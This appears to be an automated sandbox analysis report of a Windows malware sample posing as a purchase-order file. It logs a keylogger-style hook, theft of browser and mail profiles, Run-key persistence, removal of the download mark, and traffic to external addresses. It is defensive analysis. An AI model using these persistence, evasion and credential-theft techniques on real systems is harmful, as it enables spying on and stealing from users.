Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50037 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87A3D0	0_2_00007FFD9B87A3D0
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87D34D	0_2_00007FFD9B87D34D
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B8832BC	0_2_00007FFD9B8832BC
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B872A2C	0_2_00007FFD9B872A2C
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87A7B1	0_2_00007FFD9B87A7B1
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87F519	0_2_00007FFD9B87F519
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87BC7A	0_2_00007FFD9B87BC7A
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B883309	0_2_00007FFD9B883309
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B950050	0_2_00007FFD9B950050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00FF40C8	2_2_00FF40C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00FFC02D	2_2_00FFC02D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00FFF2C0	2_2_00FFF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00FF4410	2_2_00FF4410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00FF4CE0	2_2_00FF4CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05002958	2_2_05002958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05002968	2_2_05002968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D3600	2_2_063D3600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D82B8	2_2_063D82B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063DD058	2_2_063DD058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063DBC58	2_2_063DBC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D58D8	2_2_063D58D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D6980	2_2_063D6980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063DF688	2_2_063DF688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D0040	2_2_063D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D6043	2_2_063D6043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_063D0017	2_2_063D0017

Source: C:\Users\user\Desktop\PO54782322024.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068

Source: PO54782322024.exe

Static PE information: No import functions for PE file found

Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename568664f0-e437-4bb6-b6aa-41143e0997d7.exe4 vs PO54782322024.exe
Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePatekPorot.exe4 vs PO54782322024.exe
Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUyuximizefomusoboce2 vs PO54782322024.exe
Source: PO54782322024.exe, 00000000.00000002.1904832699.0000017F04610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUyuximizefomusoboce2 vs PO54782322024.exe
Source: PO54782322024.exe	Binary or memory string: OriginalFilenamePatekPorot.exe4 vs PO54782322024.exe

Source: PO54782322024.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9990080887770137

Source: PO54782322024.exe, ------------------.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@9/12@3/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\AppPoint

Jump to behavior

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6844

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c14a4b33-77eb-45ab-9dad-2ed2a2443202

Jump to behavior

Source: PO54782322024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO54782322024.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO54782322024.exe	ReversingLabs: Detection: 47%
Source: PO54782322024.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\PO54782322024.exe

File read: C:\Users\user\Desktop\PO54782322024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO54782322024.exe "C:\Users\user\Desktop\PO54782322024.exe"
Source: C:\Users\user\Desktop\PO54782322024.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO54782322024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\PO54782322024.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO54782322024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO54782322024.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO54782322024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO54782322024.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*+T source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.pdb`w. source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: RegSvcs.pdb, source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0K source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: RegSvcs.pdb source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
Source:	Binary string: .pdbHJ source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbnt[ source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbuery actR source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: C:\Users\user\Desktop\PO54782322024.exe11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb64\v4.0.30319\diasymreader.dll source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb13 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.pdbPD source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb~?5 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbP source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: 9nlpC:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3F0B.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B87D34D pushad ; retf FFEEh	0_2_00007FFD9B87D55E
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B8790CA pushad ; retf	0_2_00007FFD9B8790E9
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B950050 push esp; retf 4810h	0_2_00007FFD9B950312
Source: C:\Users\user\Desktop\PO54782322024.exe	Code function: 0_2_00007FFD9B951959 push ecx; iretd	0_2_00007FFD9B951962

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPoint			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPoint			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO54782322024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
